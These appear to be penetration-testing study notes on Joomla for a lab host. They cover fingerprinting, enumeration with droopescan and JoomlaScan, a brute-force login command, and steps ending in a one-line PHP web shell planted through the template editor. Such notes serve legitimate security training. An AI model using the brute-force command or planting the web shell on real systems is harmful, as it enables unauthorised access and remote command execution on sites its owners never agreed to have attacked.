Open-source CMS used for discussion forums, photo galleries, e-Commerce, user-based communities, and more. PHP and MySQL backend.

Fingerprint

# check for Joomla
curl -s http://dev.inlanefreight.local/ | grep Joomla

Typical Joomla robots.txt follows this formatting

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

The Joomla favicon may also be used.

The README.txt file may also be present.

curl -s http://dev.inlanefreight.local/README.txt | head -n 5

We may also fingerprint the version in the following files

curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

As well as the plugins/system/cache/cache.xml.

Enumeration

We can use droopescan that works for SilverStripe, WordPress, and Drupal with some functionality for Joomla and Moodle.

droopescan scan joomla --url http://dev.inlanefreight.local/

Another popular tool, JoomlaScan which is currently out-of-date.

python2 joomlascan.py -u http://dev.inlanefreight.local
 
# brute force login
sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

The typical username for Joomla websites is admin.

Attacking

If we come across leaked credentials we can login into the administrator page and Templates-->Configuration-->{Pick-Template}-->Template Columns-->Templates: Customise

We pick our target page and bring in a webshell

system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e'])